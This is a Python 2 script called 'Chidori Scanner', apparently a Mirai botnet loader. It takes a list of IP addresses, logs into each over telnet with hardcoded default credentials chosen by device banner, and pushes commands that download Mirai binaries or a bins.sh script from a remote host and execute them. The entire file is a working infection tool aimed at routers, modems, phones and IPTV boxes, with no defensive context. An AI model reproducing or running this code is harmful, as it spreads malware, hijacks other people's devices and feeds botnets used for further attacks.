
[Python] Chidori Scanner

  1. #!/usr/bin/python
  2. # Chidori Scanner
  3.  
  4. import threading
  5. import sys, os, re, time, socket
  6. from Queue import *
  7. from sys import stdout
  8.  
  9. if len(sys.argv) < 3:
  10. print "Usage: python "+sys.argv[0]+" <list> <threads>"
  11. sys.exit()
  12.  
  13. #SHIT THAT DONT NEED TO BE CHANGED
  14. ips = open(sys.argv[1], "r").readlines()
  15. threads = int(sys.argv[2])
  16. queue = Queue()
  17. queue_count = 0
  18.  
  19. #CONFIG#
  20. cmd_mips = "cd /tmp; rm -rf *; wget http://1.1.1.1/bins/mirai.mips || tftp -r mirai.mips -g 1.1.1.1 || tftp 1.1.1.1 -g mirai.mips; cat mirai.mips > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper"
  21. cmd_mipsel = "cd /tmp; rm -rf *; wget http://1.1.1.1/bins/mirai.mpsl || tftp -r mirai.mpsl -g 1.1.1.1 || tftp 1.1.1.1 -g mirai.mpsl; cat mirai.mpsl > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper"
  22. cmd_arm = "cd /tmp; rm -rf *; wget http://1.1.1.1/bins/mirai.arm7; cat mirai.arm7 > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper"
  23. bin_sh = "http://1.1.1.1/bins.sh"
  24.  
  25. #ADDING IPS TO QUEUE#
  26. for ip in ips:
  27. queue_count += 1
  28. stdout.write("\r[%d] Added to queue" % queue_count)
  29. stdout.flush()
  30. queue.put(ip)
  31. print "\n"
  32.  
  33. #USER/PASS INFO
  34. combo = ["support:support", "admin:admin", "supervisor:zyad1234", "user:user"] #dont change
  35. usernames = ["root", "admin", "root", "admin"]
  36. passwords = ["oelinux123", "admin", "admin", "skbiptv"]
  37.  
  38. #HACKIFICATION ACTION#
  39. class router(threading.Thread):
  40. def __init__ (self, ip):
  41. threading.Thread.__init__(self)
  42. self.ip = str(ip).rstrip('\n')
  43. def run(self):
  44. end = 0
  45. while (end == 0):
  46. try:
  47. try:
  48. tn = socket.socket()
  49. tn.settimeout(8)
  50. tn.connect((self.ip,23))
  51. except Exception:
  52. end = 1
  53. tn.close()
  54. username = ""
  55. password = ""
  56. for passwd in combo:
  57. if ":n/a" in passwd:
  58. password=""
  59. else:
  60. password=passwd.split(":")[1]
  61. if "n/a:" in passwd:
  62. username=""
  63. else:
  64. username=passwd.split(":")[0]
  65. try:
  66. hoho = ''
  67. hoho += readUntil(tn, ":")
  68. if "BCM" in hoho:
  69. tn.send(username + "\n")
  70. time.sleep(0.09)
  71. elif "6511" in hoho:
  72. tn.send(username + "\n")
  73. time.sleep(0.09)
  74. elif "tangox" in hoho:
  75. tn.send("default" + "\n")
  76. time.sleep(0.09)
  77. elif "VMG" in hoho:
  78. password = "1234567890"
  79. tn.send("adminpldt" + "\n")
  80. time.sleep(0.1)
  81. elif "mdm9625" in hoho:
  82. nonr00t = 1
  83. username = usernames[1]
  84. password = passwords[1]
  85. tn.send(username + "\n")
  86. time.sleep(0.1)
  87. elif "9615-cdp" in hoho:
  88. r00t = 1
  89. username = usernames[0]
  90. password = passwords[0]
  91. tn.send(username + "\n")
  92. time.sleep(0.1)
  93. elif "Login as:" in hoho:
  94. ONT = 1
  95. username = usernames[2]
  96. password = passwords[2]
  97. tn.send(username + "\n")
  98. time.sleep(0.1)
  99. elif "(none)" in hoho:
  100. skbiptv = 1
  101. username = usernames[3]
  102. password = passwords[3]
  103. tn.send(username + "\n")
  104. time.sleep(0.1)
  105. else:
  106. tn.send(username + "\n")
  107. time.sleep(0.1)
  108. except Exception:
  109. end = 1
  110. tn.close()
  111. try:
  112. hoho = ''
  113. hoho += readUntil(tn, "assword:")
  114. if "assword" in hoho:
  115. tn.send(password + "\n")
  116. time.sleep(0.8)
  117. else:
  118. pass
  119. except Exception:
  120. end = 1
  121. tn.close()
  122. try:
  123. prompt = ''
  124. prompt += tn.recv(40960)
  125. if ">" in prompt:
  126. tn.send("cat | sh" + "\n")
  127. time.sleep(0.1)
  128. tn.send("sh" + "\n")
  129. time.sleep(0.1)
  130. tn.send(cmd_mips + "\n")
  131. print "\033[32m[%s] xDSL Command Sent!\033[37m"%(self.ip)
  132. time.sleep(10)
  133. tn.close()
  134. end = 1
  135. elif "default@" in prompt:
  136. tn.send(cmd_mipsel + "\n")
  137. print "\033[36m[%s] TangoX Command Sent!\033[37m"%(self.ip)
  138. time.sleep(10)
  139. tn.close()
  140. end = 1
  141. elif "Number:" in prompt:
  142. tn.send("24" + "\n")
  143. time.sleep(0.5)
  144. tn.send("8" + "\n")
  145. time.sleep(0.5)
  146. tn.send(cmd_mips + "\n")
  147. print "\033[35m[%s] VMG Command Sent!\033[37m"%(self.ip)
  148. time.sleep(10)
  149. tn.close()
  150. end = 1
  151. elif r00t:
  152. tn.send(cmd_arm + "\n")
  153. print "\033[33m[%s] Phone Command Sent!\033[37m"%(self.ip)
  154. time.sleep(10)
  155. tn.close()
  156. end = 1
  157. elif nonr00t:
  158. tn.send("su" + "\n")
  159. readUntil(tn, "Password:")
  160. tn.send(passwords[0] + "\n")
  161. time.sleep(0.5)
  162. tn.send(cmd_arm + "\n")
  163. print "\033[33m[%s] Phone Command Sent!\033[37m"%(self.ip)
  164. time.sleep(10)
  165. tn.close()
  166. end = 1
  167. elif ONT:
  168. tn.send("enable" + "\n")
  169. time.sleep(0.2)
  170. tn.send("system" + "\n")
  171. time.sleep(0.2)
  172. tn.send("shell" + "\n")
  173. time.sleep(0.2)
  174. command = "cd /tmp; wget "+bin_sh+"; sh bins.sh; rm -rf bins.sh"
  175. tn.send(command + "\n")
  176. print "\033[34m[%s] ONT Command Sent!\033[37m"%(self.ip)
  177. time.sleep(10)
  178. tn.close()
  179. end = 1
  180. elif skbiptv:
  181. tn.send(cmd_mips + "\n")
  182. print "\033[34m[%s] SKBIPTV Command Sent!\033[37m"%(self.ip)
  183. time.sleep(10)
  184. tn.close()
  185. end = 1
  186. else:
  187. if "#" in prompt or "$" in prompt:
  188. tn.send("sh" + "\n")
  189. time.sleep(0.2)
  190. tn.send("shell" + "\n")
  191. time.sleep(0.2)
  192. tn.send("system shell" + "\n")
  193. time.sleep(0.2)
  194. command = "cd /tmp; wget "+bin_sh+"; sh bins.sh; rm -rf bins.sh"
  195. tn.send(command + "\n")
  196. print "\033[37m[%s] Command Sent!\033[37m"%(self.ip)
  197. time.sleep(20)
  198. tn.close()
  199. end = 1
  200. else:
  201. pass
  202. except Exception:
  203. end = 1
  204. tn.close()
  205. except:
  206. pass
  207.  
  208. #SOCKET READ UNTIL#
  209. def readUntil(tn, string, timeout=10):
  210. buf = ''
  211. start_time = time.time()
  212. while time.time() - start_time < timeout:
  213. buf += tn.recv(2048)
  214. time.sleep(0.01)
  215. if string in buf: return buf
  216. raise Exception('TIMEOUT!')
  217.  
  218. #WORKER THREAD#
  219. def worker():
  220. try:
  221. while True:
  222. try:
  223. iP = queue.get()
  224. thrd = router(iP)
  225. thrd.start()
  226. queue.task_done()
  227. time.sleep(0.2)
  228. except:
  229. pass
  230. except:
  231. pass
  232.  
  233. #STARTING WORKER THREADS#
  234. for l in xrange(threads):
  235. try:
  236. t = threading.Thread(target=worker)
  237. t.start()
  238. time.sleep(0.009)
  239. except:
  240. pass